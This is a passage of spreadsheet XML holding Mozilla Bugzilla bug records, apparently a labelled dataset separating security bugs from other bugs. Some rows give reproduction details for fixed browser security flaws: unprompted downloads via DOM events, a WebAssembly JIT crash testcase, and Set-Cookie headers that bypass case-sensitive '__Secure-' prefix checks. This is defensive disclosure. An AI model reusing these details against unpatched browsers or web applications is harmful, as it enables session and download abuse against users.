          <t>Unspecified</t>
        </is>
      </c>
      <c r="M900" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N900" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O900" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P900" t="inlineStr">
        <is>
          <t>[unifiedTelemetry][40b7]</t>
        </is>
      </c>
      <c r="Q900" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R900" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S900" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T900" t="n">
        <v>1</v>
      </c>
      <c r="U900" t="n">
        <v>0</v>
      </c>
      <c r="V900" t="n">
        <v>4</v>
      </c>
      <c r="W900" t="inlineStr">
        <is>
          <t>We have a rollup based on v4 data: https://bugzilla.mozilla.org/show_bug.cgi?id=1155871
This bug is for the design and implementation of handling the v2-&gt;v4 transition, where we will need to combine data from both rollups.</t>
        </is>
      </c>
      <c r="X900" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="901">
      <c r="A901" t="n">
        <v>265176</v>
      </c>
      <c r="B901" t="inlineStr">
        <is>
          <t>2004-10-19 19:48:10 -0700</t>
        </is>
      </c>
      <c r="C901" t="inlineStr">
        <is>
          <t>Javascript  allows websites to download content without prompt.</t>
        </is>
      </c>
      <c r="D901" t="inlineStr">
        <is>
          <t>2011-06-30 12:18:53 -0700</t>
        </is>
      </c>
      <c r="E901" t="n">
        <v>1</v>
      </c>
      <c r="F901" t="n">
        <v>1</v>
      </c>
      <c r="G901" t="n">
        <v>3</v>
      </c>
      <c r="H901" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I901" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J901" t="inlineStr">
        <is>
          <t>DOM: Events</t>
        </is>
      </c>
      <c r="K901" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L901" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M901" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N901" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O901" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P901" t="inlineStr">
        <is>
          <t>[sg:low] has patch, has approval, needs landing</t>
        </is>
      </c>
      <c r="Q901" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R901" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S901" t="inlineStr">
        <is>
          <t>mozilla1.8alpha5</t>
        </is>
      </c>
      <c r="T901" t="n">
        <v>1</v>
      </c>
      <c r="U901" t="n">
        <v>0</v>
      </c>
      <c r="V901" t="n">
        <v>17</v>
      </c>
      <c r="W901" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.3) Gecko/20041014 Firefox/0.10.1
Build Identifier: Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.3) Gecko/20041014 Firefox/0.10.1
Alt + click downloads a link without
a prompt.
Using dom events, this user
feature can
be emulated.
The result is content from any url
may be downloaded to the default
downloads folder.
Reproducible: Always
Steps to Reproduce:
1. Put code in onload event
Expected Results:  
Prompt user,
or filter this
event.</t>
        </is>
      </c>
      <c r="X901" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="902">
      <c r="A902" t="n">
        <v>74880</v>
      </c>
      <c r="B902" t="inlineStr">
        <is>
          <t>2001-04-05 11:36:13 -0700</t>
        </is>
      </c>
      <c r="C902" t="inlineStr">
        <is>
          <t>Lose indentation of RTL blockquote (nested RTL lists are fixed)</t>
        </is>
      </c>
      <c r="D902" t="inlineStr">
        <is>
          <t>2010-09-14 07:14:35 -0700</t>
        </is>
      </c>
      <c r="E902" t="n">
        <v>1</v>
      </c>
      <c r="F902" t="n">
        <v>1</v>
      </c>
      <c r="G902" t="n">
        <v>3</v>
      </c>
      <c r="H902" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I902" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J902" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K902" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L902" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M902" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N902" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O902" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P902" t="inlineStr"/>
      <c r="Q902" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R902" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S902" t="inlineStr">
        <is>
          <t>mozilla1.7alpha</t>
        </is>
      </c>
      <c r="T902" t="n">
        <v>1</v>
      </c>
      <c r="U902" t="n">
        <v>14</v>
      </c>
      <c r="V902" t="n">
        <v>108</v>
      </c>
      <c r="W902" t="inlineStr">
        <is>
          <t>From Bugzilla Helper:
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)
BuildID:    00000000 - Bidi build dated 20010404
When setting the Bidi option orientation to RTL, the nested ordered lists loose 
their proper indentation
Reproducible: Always
Steps to Reproduce:
1.Open file ol.htm
2.From the View Menu - Bidi Options, select Orientation to be RTL
Actual Results:  The indented ordered lists are completely right aligned 
loosing their proper indentation
Expected Results:  The list should remain indented same as when displayed LTR. 
Check IE5 for comparable results.</t>
        </is>
      </c>
      <c r="X902" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="903">
      <c r="A903" t="n">
        <v>1707774</v>
      </c>
      <c r="B903" t="inlineStr">
        <is>
          <t>2021-04-26 16:56:02 -0700</t>
        </is>
      </c>
      <c r="C903" t="inlineStr">
        <is>
          <t>Live range splitting can lead to conflicting assignments (was: Assertion failure: *def-&gt;output() == alloc, at jit/RegisterAllocator.cpp:257)</t>
        </is>
      </c>
      <c r="D903" t="inlineStr">
        <is>
          <t>2024-05-30 10:30:32 -0700</t>
        </is>
      </c>
      <c r="E903" t="n">
        <v>1</v>
      </c>
      <c r="F903" t="n">
        <v>1</v>
      </c>
      <c r="G903" t="n">
        <v>3</v>
      </c>
      <c r="H903" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I903" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J903" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K903" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L903" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M903" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N903" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O903" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P903" t="inlineStr">
        <is>
          <t>[sec-survey][post-critsmash-triage][adv-main91+]</t>
        </is>
      </c>
      <c r="Q903" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R903" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S903" t="inlineStr">
        <is>
          <t>91 Branch</t>
        </is>
      </c>
      <c r="T903" t="n">
        <v>1</v>
      </c>
      <c r="U903" t="n">
        <v>0</v>
      </c>
      <c r="V903" t="n">
        <v>50</v>
      </c>
      <c r="W903" t="inlineStr">
        <is>
          <t>Created attachment 9218516
testcase.wasm
This is `testcase.wrapper`, `testcase.wasm` is attached.
```js
new WebAssembly.Instance(new WebAssembly.Module(read(scriptArgs[0], "binary")));
```
```
Process 36979 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x0)
    frame #0: 0x0000000100977330 js-dbg-64-darwin-arm64-15253a3168d2`_OUTLINED_FUNCTION_0 [opt]
js-dbg-64-darwin-arm64-15253a3168d2`_OUTLINED_FUNCTION_0:
-&gt;  0x100977330 &lt;+0&gt;: str    w19, [x8]
    0x100977334 &lt;+4&gt;: b      0x101406e94               ; symbol stub for: abort
js-dbg-64-darwin-arm64-15253a3168d2`_OUTLINED_FUNCTION_1:
    0x100977338 &lt;+0&gt;: mov    w19, #0x476
    0x10097733c &lt;+4&gt;: mov    w2, #0x476
Target 0: (js-dbg-64-darwin-arm64-15253a3168d2) stopped.
(lldb) bt
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x0)
  * frame #0: 0x0000000100977330 js-dbg-64-darwin-arm64-15253a3168d2`_OUTLINED_FUNCTION_0 [opt]
    frame #1: 0x000000010132dafc js-dbg-64-darwin-arm64-15253a3168d2`js::jit::AllocationIntegrityState::checkIntegrity(js::jit::LBlock*, js::jit::LInstruction*, unsigned int, js::jit::LAllocation) (.cold.17) at RegisterAllocator.cpp:39:19 [opt]
    frame #2: 0x000000010096d280 js-dbg-64-darwin-arm64-15253a3168d2`js::jit::AllocationIntegrityState::checkIntegrity(this=0x000000016fdf9a98, block=0x00000001060ebc28, ins=&lt;unavailable&gt;, vreg=7, alloc=(bits_ = 27)) at RegisterAllocator.cpp:257:9 [opt]
    frame #3: 0x000000010096bf80 js-dbg-64-darwin-arm64-15253a3168d2`js::jit::AllocationIntegrityState::check(this=0x000000016fdf9a98) at RegisterAllocator.cpp:207:14 [opt]
    frame #4: 0x00000001008ab05c js-dbg-64-darwin-arm64-15253a3168d2`js::jit::GenerateLIR(mir=0x000000016fdf9ef0) at Ion.cpp:1536:26 [opt]
    frame #5: 0x00000001009fe26c js-dbg-64-darwin-arm64-15253a3168d2`js::wasm::IonCompileFunctions(moduleEnv=0x000000016fdfda90, compilerEnv=&lt;unavailable&gt;, lifo=0x0000000105785820, inputs=&lt;unavailable&gt;, code=&lt;unavailable&gt;, error=&lt;unavailable&gt;) at WasmIonCompile.cpp:5760:23 [opt]
    frame #6: 0x00000001009e8c6c js-dbg-64-darwin-arm64-15253a3168d2`ExecuteCompileTask(task=0x0000000105785800, error=0x000000016fdfde50) at WasmGenerator.cpp:781:16 [opt]
    frame #7: 0x00000001009e9610 js-dbg-64-darwin-arm64-15253a3168d2`js::wasm::ModuleGenerator::finishFuncDefs() [inlined] js::wasm::ModuleGenerator::locallyCompileCurrentTask(this=0x000000016fdfc8d0) at WasmGenerator.cpp:842:8 [opt]
    frame #8: 0x00000001009e9608 js-dbg-64-darwin-arm64-15253a3168d2`js::wasm::ModuleGenerator::finishFuncDefs(this=0x000000016fdfc8d0) at WasmGenerator.cpp:980 [opt]
    frame #9: 0x00000001009c33b0 js-dbg-64-darwin-arm64-15253a3168d2`bool DecodeCodeSection&lt;js::wasm::Decoder&gt;(env=0x000000016fdfda90, d=0x000000016fdfc890, mg=0x000000016fdfc8d0) at WasmCompile.cpp:686:13 [opt]
    frame #10: 0x00000001009c304c js-dbg-64-darwin-arm64-15253a3168d2`js::wasm::CompileBuffer(args=&lt;unavailable&gt;, bytecode=&lt;unavailable&gt;, error=&lt;unavailable&gt;, warnings=&lt;unavailable&gt;, listener=&lt;unavailable&gt;) at WasmCompile.cpp:708:8 [opt]
    frame #11: 0x0000000100a1375c js-dbg-64-darwin-arm64-15253a3168d2`js::WasmModuleObject::construct(cx=0x0000000105743000, argc=&lt;unavailable&gt;, vp=&lt;unavailable&gt;) at WasmJS.cpp:1517:7 [opt]
    frame #12: 0x0000000100073eb0 js-dbg-64-darwin-arm64-15253a3168d2`CallJSNative(cx=0x0000000105743000, native=(js-dbg-64-darwin-arm64-15253a3168d2`js::WasmModuleObject::construct(JSContext*, unsigned int, JS::Value*) at WasmJS.cpp:1483), reason=&lt;unavailable&gt;, args=0x000000016fdfe198)(JSContext*, unsigned int, JS::Value*), js::CallReason, JS::CallArgs const&amp;) at Interpreter.cpp:437:13 [opt]
    frame #13: 0x000000010007c5f4 js-dbg-64-darwin-arm64-15253a3168d2`CallJSNativeConstructor(cx=0x0000000105743000, native=(js-dbg-64-darwin-arm64-15253a3168d2`js::WasmModuleObject::construct(JSContext*, unsigned int, JS::Value*) at WasmJS.cpp:1483), args=0x000000016fdfe198)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) at Interpreter.cpp:453:8 [opt]
    frame #14: 0x00000001000748b0 js-dbg-64-darwin-arm64-15253a3168d2`InternalConstruct(cx=&lt;unavailable&gt;, args=0x000000016fdfe198) at Interpreter.cpp:626:14 [opt]
    frame #15: 0x00000001000745d8 js-dbg-64-darwin-arm64-15253a3168d2`js::ConstructFromStack(cx=&lt;unavailable&gt;, args=&lt;unavailable&gt;) at Interpreter.cpp:672:10 [opt] [artificial]
    frame #16: 0x000000010006b900 js-dbg-64-darwin-arm64-15253a3168d2`Interpret(cx=&lt;unavailable&gt;, state=0x000000016fdfe630) at Interpreter.cpp:3238:16 [opt]
    frame #17: 0x00000001000648f0 js-dbg-64-darwin-arm64-15253a3168d2`js::RunScript(cx=0x0000000105743000, state=0x000000016fdfe630) at Interpreter.cpp:406:13 [opt]
    frame #18: 0x00000001000750e4 js-dbg-64-darwin-arm64-15253a3168d2`js::ExecuteKernel(cx=0x0000000105743000, script=&lt;unavailable&gt;, envChainArg=JS::HandleObject @ x21, newTargetValue=&lt;unavailable&gt;, evalInFrame=(ptr_ = 0), result=JS::MutableHandleValue @ 0x000000016fdfe6a0) at Interpreter.cpp:776:13 [opt]
    frame #19: 0x0000000100075320 js-dbg-64-darwin-arm64-15253a3168d2`js::Execute(cx=0x0000000105743000, script=JS::HandleScript @ x21, envChain=JS::HandleObject @ x20, rval=JS::MutableHandleValue @ x19) at Interpreter.cpp:808:10 [opt]
    frame #20: 0x000000010015de94 js-dbg-64-darwin-arm64-15253a3168d2`ExecuteScript(cx=0x0000000105743000, envChain=JS::HandleObject @ 0x000000016fdfe780, script=JS::HandleScript @ 0x000000016fdfe778, rval=JS::MutableHandleValue @ x19) at CompilationAndEvaluation.cpp:491:10 [opt]
    frame #21: 0x000000010015e068 js-dbg-64-darwin-arm64-15253a3168d2`JS_ExecuteScript(cx=0x0000000105743000, scriptArg=JS::HandleScript @ x19) at CompilationAndEvaluation.cpp:515:10 [opt]
    frame #22: 0x00000001000463cc js-dbg-64-darwin-arm64-15253a3168d2`RunFile(cx=0x0000000105743000, filename=&lt;unavailable&gt;, file=&lt;unavailable&gt;, compileMethod=&lt;unavailable&gt;, compileOnly=false) at js.cpp:1065:10 [opt]
    frame #23: 0x0000000100045d68 js-dbg-64-darwin-arm64-15253a3168d2`Process(cx=0x0000000105743000, filename="testcase.wrapper", forceTTY=false, kind=FileScript) at js.cpp:1656:14 [opt]
    frame #24: 0x00000001000103b4 js-dbg-64-darwin-arm64-15253a3168d2`Shell(JSContext*, js::cli::OptionParser*, char**) at js.cpp:10934:10 [opt]
    frame #25: 0x0000000100010360 js-dbg-64-darwin-arm64-15253a3168d2`Shell(cx=&lt;unavailable&gt;, op=0x000000016fdff270, envp=&lt;unavailable&gt;) at js.cpp:11658 [opt]
    frame #26: 0x000000010000a908 js-dbg-64-darwin-arm64-15253a3168d2`main(argc=&lt;unavailable&gt;, argv=&lt;unavailable&gt;, envp=&lt;unavailable&gt;) at js.cpp:12613:12 [opt]
    frame #27: 0x000000019b1c5f34 libdyld.dylib`start + 4
```
```
The first bad revision is:
changeset:   https://hg.mozilla.org/mozilla-central/rev/b3dfcb849dd2
user:        Julian Seward
date:        Wed Apr 14 07:43:27 2021 +0000
summary:     Bug 1686626 - Enable Ion by default for wasm on AArch64.  r=lth.
```
Run with `--fuzzing-safe --no-threads --no-baseline --no-ion testcase.wrapper testcase.wasm`, compile with `AUTOCONF=/usr/local/Cellar/autoconf213/2.13/bin/autoconf213 AR=ar sh ./configure --enable-debug --with-ccache --enable-gczeal --enable-debug-symbols --disable-tests`, tested on m-c rev 15253a3168d2.
Not sure if this is s-s, I'd leave it to Julian/Lars.</t>
        </is>
      </c>
      <c r="X903" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="904">
      <c r="A904" t="n">
        <v>700512</v>
      </c>
      <c r="B904" t="inlineStr">
        <is>
          <t>2011-11-07 16:51:02 -0800</t>
        </is>
      </c>
      <c r="C904" t="inlineStr">
        <is>
          <t>Workers + Files exposes threadsafety assertions with DataOwner</t>
        </is>
      </c>
      <c r="D904" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E904" t="n">
        <v>1</v>
      </c>
      <c r="F904" t="n">
        <v>1</v>
      </c>
      <c r="G904" t="n">
        <v>3</v>
      </c>
      <c r="H904" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I904" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J904" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K904" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L904" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M904" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N904" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O904" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P904" t="inlineStr">
        <is>
          <t>[sg:high][qa?]</t>
        </is>
      </c>
      <c r="Q904" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R904" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S904" t="inlineStr">
        <is>
          <t>mozilla9</t>
        </is>
      </c>
      <c r="T904" t="n">
        <v>1</v>
      </c>
      <c r="U904" t="n">
        <v>0</v>
      </c>
      <c r="V904" t="n">
        <v>21</v>
      </c>
      <c r="W904" t="inlineStr">
        <is>
          <t>Jonas reports that bent has seen threadsafety assertions from DataOwner when manipulating File objects in Workers in certain ways.</t>
        </is>
      </c>
      <c r="X904" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="905">
      <c r="A905" t="n">
        <v>1891349</v>
      </c>
      <c r="B905" t="inlineStr">
        <is>
          <t>2024-04-14 04:40:42 -0700</t>
        </is>
      </c>
      <c r="C905" t="inlineStr">
        <is>
          <t>Firefox doesn't treat cookie name prefixes as case-insensitive</t>
        </is>
      </c>
      <c r="D905" t="inlineStr">
        <is>
          <t>2024-06-12 20:43:37 -0700</t>
        </is>
      </c>
      <c r="E905" t="n">
        <v>1</v>
      </c>
      <c r="F905" t="n">
        <v>1</v>
      </c>
      <c r="G905" t="n">
        <v>3</v>
      </c>
      <c r="H905" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I905" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J905" t="inlineStr">
        <is>
          <t>Networking: Cookies</t>
        </is>
      </c>
      <c r="K905" t="inlineStr">
        <is>
          <t>Firefox 126</t>
        </is>
      </c>
      <c r="L905" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M905" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N905" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O905" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P905" t="inlineStr">
        <is>
          <t>[necko-triaged][adv-main127+]</t>
        </is>
      </c>
      <c r="Q905" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R905" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S905" t="inlineStr">
        <is>
          <t>127 Branch</t>
        </is>
      </c>
      <c r="T905" t="n">
        <v>1</v>
      </c>
      <c r="U905" t="n">
        <v>0</v>
      </c>
      <c r="V905" t="n">
        <v>16</v>
      </c>
      <c r="W905" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Steps to reproduce:
Hi there, I'm sorry if this is not the right location to report this.
"draft-ietf-httpbis-rfc6265bis-13" (Cookies: HTTP State Management Mechanism) [1] says at "5.4.  Cookie Name Prefixes":
   User agents' requirements for cookie name prefixes differ slightly
   from servers' (Section 4.1.3) in that UAs MUST match the prefix
   string case-insensitively.
   The normative requirements for the prefixes are detailed in the
   storage model algorithm defined in Section 5.6.
   This is because some servers will process cookie case-insensitively,
   resulting in them unintentionally miscapitalizing and accepting
   miscapitalized prefixes.
   For example, if a server sends the following Set-Cookie header field
   Set-Cookie: __SECURE-SID=12345
   to a UA which checks prefixes case-sensitively it will accept this
   cookie and the server would incorrectly believe the cookie is subject
   the same guarantees as one spelled __Secure-.
(This section is present since draft version 11 ("draft-ietf-httpbis-rfc6265bis-11"), published on 2022-11-07.)
One such example of a server/framework is ASP.NET Core, where a code like
    context.Request.Cookies.TryGetValue("__Secure-SID", ...)
will also return a cookie whose name is "__SECURE-SID", "__secure-SID" etc.
However, I noticed Firefox Nightly (version 126.0a1 (2024-04-13)) seems to still treat the cookie prefixes "__Host-" and "__Secure-" as case-sensitive. For example, if I send the following header in a HTTP response (with the correct "__Secure-" prefix):
    Set-Cookie: __Secure-SID=123456; path=/; samesite=lax; httponly
then Firefox correctly rejects the cookie as it's missing the "secure" attribute, as shown in the warning logged to the console:
    Cookie “__Secure-SID” has been rejected for invalid prefix.
However, if I send the following header in the HTTP response:
    Set-Cookie: __secure-SID=123456; path=/; samesite=lax; httponly
then Firefox doesn't log a warning and instead accepts the cookie. However, this means servers that treat cookie names case-insensitively, as shown above, might think the cookie name matches "__Secure-SID" and might therefore rely on the UA to only have accepted it if it has the "secure" attribute and was sent over a secure origin, which isn't the case here.
In contrast, Chromium seems to check the prefix with a case-insensitive comparison for the prefix name [2] (depending on the `net::features::kCaseInsensitiveCookiePrefix` feature, which seems to be enabled by default [3]).
Is there a plan to also implement a case-insensitive check for the cookie name prefixes soon? Otherwise, the security guarantees intended by the cookie name prefixes currently doesn't seem to be provided by Firefox for web servers/frameworks that treat cookie names as case-insensitive.
(As a precaution, I checked the "security issue" checkbox, as maybe this could be treated as a security issue.)
Thanks!
[1] https://datatracker.ietf.org/doc/draft-ietf-httpbis-rfc6265bis/13/
[2] https://source.chromium.org/chromium/chromium/src/+/main:net/cookies/canonical_cookie.cc;l=409-416?q=canonical_cookie.cc&amp;ss=chromium%2Fchromium%2Fsrc
[3] https://source.chromium.org/chromium/chromium/src/+/main:net/base/features.cc;l=303-305?q=kCaseInsensitiveCookiePrefix&amp;ss=chromium%2Fchromium%2Fsrc
Actual results:
When sending the following header in a HTTP response:
    Set-Cookie: __secure-SID=123456; path=/; samesite=lax; httponly
Firefox accepted the cookie, even though it misses the "secure" attribute and "draft-ietf-httpbis-rfc6265bis-13" requires the cookie prefix name ("__Secure-") to be matched case-insensitively
Expected results:
When sending the following header in a HTTP response:
    Set-Cookie: __secure-SID=123456; path=/; samesite=lax; httponly
Firefox should have rejected the cookie, because it misses the "secure" attribute and "draft-ietf-httpbis-rfc6265bis-13" requires the cookie prefix name ("__Secure-") to be matched case-insensitively.</t>
        </is>
      </c>
      <c r="X905" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="906">
      <c r="A906" t="n">
        <v>52748</v>
      </c>
      <c r="B906" t="inlineStr">
        <is>
          <t>2000-09-14 21:10:52 -0700</t>
        </is>
      </c>
      <c r="C906" t="inlineStr">
        <is>
          <t>Crash when closing any window</t>
        </is>
      </c>
      <c r="D906" t="inlineStr">
        <is>
          <t>2001-03-13 23:08:48 -0800</t>
        </is>
      </c>
      <c r="E906" t="n">
        <v>1</v>
      </c>
      <c r="F906" t="n">
        <v>1</v>
      </c>
      <c r="G906" t="n">
        <v>3</v>
      </c>
      <c r="H906" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I906" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J906" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K906" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L906" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M906" t="inlineStr">
        <is>
          <t>Mac System 8.5</t>
        </is>
      </c>
      <c r="N906" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O906" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P906" t="inlineStr"/>
      <c r="Q906" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R906" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S906" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T906" t="n">
        <v>1</v>
      </c>
      <c r="U906" t="n">
        <v>0</v>
      </c>
      <c r="V906" t="n">
        <v>6</v>
      </c>
      <c r="W906" t="inlineStr">
        <is>
          <t>Current Mozilla builds crash when closing any window (browser, mail), with this 
stack:
...
  0BA2CC20    PPC  1E701298  nsWebShellWindow::Close()+0001C
  0BA2CBE0    PPC  1E708148  nsWebShellWindow::Destroy()+00318
  0BA2CB30    PPC  1E72B8D0  nsXULWindow::Destroy()+0062C
  0BA2C9D0    PPC  1E1BA470  nsWebShell::Destroy()+00038
  0BA2C990    PPC  1E1895D4  nsDocShell::Destroy()+00108
  0BA2C940    PPC  1E1756C4  nsDocShell::DestroyChildren()+000F4
  0BA2C8D0    PPC  1E1BA470  nsWebShell::Destroy()+00038
  0BA2C890    PPC  1E1895C4  nsDocShell::Destroy()+000F8
  0BA2C840    PPC  1E18A228 
nsGetInterface::nsGetInterface(nsISupports*, unsignedint)+11668
  0BA2C800    PPC  1E1A4CE0 
nsGetInterface::nsGetInterface(nsISupports*, unsignedint*)+2C120
  0BA2C7C0    PPC  1E1A4B60 
nsGetInterface::nsGetInterface(nsISupports*, unsignedint*)+2BFA0
  0BA2C780    PPC  1DCCA6D4  DocumentViewerImpl::Release()+0008C
  0BA2C740    PPC  1DCCB2DC  DocumentViewerImpl::~DocumentViewerImpl()+00808
  0BA2C650    PPC  1CC65D8C  nsViewManager2::Release()+00054
  0BA2C610    PPC  1CC5F024  nsView::Destroy()+00028
  0BA2C5D0    PPC  1CC5E920  nsView::~nsView()+000AC
  0BA2C570    PPC  1CC5F024  nsView::Destroy()+00028
  0BA2C530    PPC  1CC633D4  nsScrollPortView::~nsScrollPortView()+000DC
  0BA2C4E0    PPC  1CC5E920  nsView::~nsView()+000AC
  0BA2C480    PPC  1CC5F024  nsView::Destroy()+00028
  0BA2C440    PPC  1CC5E9DC  nsView::~nsView()+00168
  0BA2C3E0    PPC  1CC6A618  nsViewManager2::RemoveChild(nsIView*, nsIView*)+
000A4
  0BA2C390    PPC  1CC68A54  nsViewManager2::UpdateView(nsIView*,
unsigned int)+00078
  0BA2C340    PPC  1CC68D8C  nsViewManager2::UpdateView(nsIView*, const
nsRect&amp;,unsigned int)+002E0
  0BA2C280    PPC  1CABC7A8  nsWindow::Invalidate(const nsRect&amp;, int)+00080
  0BA2C200    PPC  1CABFD14  nsWindow::ConvertToDeviceCoordinates(int&amp;, int&amp;)+
0002C
  0BA2C1C0    PPC  1CABF440  nsWindow::CalcOffset(int&amp;, int&amp;)+000B4
The crash is in nsWindow::GetParent, because mParent is bad.
This is very like bug 3974, which pierre fixed over a year ago, so here you go, 
pierre! May the force be with you.</t>
        </is>
      </c>
      <c r="X906" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="907">
      <c r="A907" t="n">
        <v>1812338</v>
      </c>
      <c r="B907" t="inlineStr">
        <is>
          <t>2023-01-25 07:00:25 -0800</t>
        </is>
      </c>
      <c r="C907" t="inlineStr">
        <is>
          <t>.URL file can also send NTLM hashes</t>
        </is>
      </c>
      <c r="D907" t="inlineStr">
        <is>
          <t>2024-05-30 11:04:33 -0700</t>
        </is>
      </c>
      <c r="E907" t="n">
        <v>1</v>
      </c>
      <c r="F907" t="n">
        <v>1</v>
      </c>
      <c r="G907" t="n">
        <v>2</v>
      </c>
      <c r="H907" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I907" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J907" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K907" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L907" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M907" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N907" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O907" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P907" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q907" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R907" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S907" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T907" t="n">
        <v>0</v>
      </c>
      <c r="U907" t="n">
        <v>0</v>
      </c>
      <c r="V907" t="n">
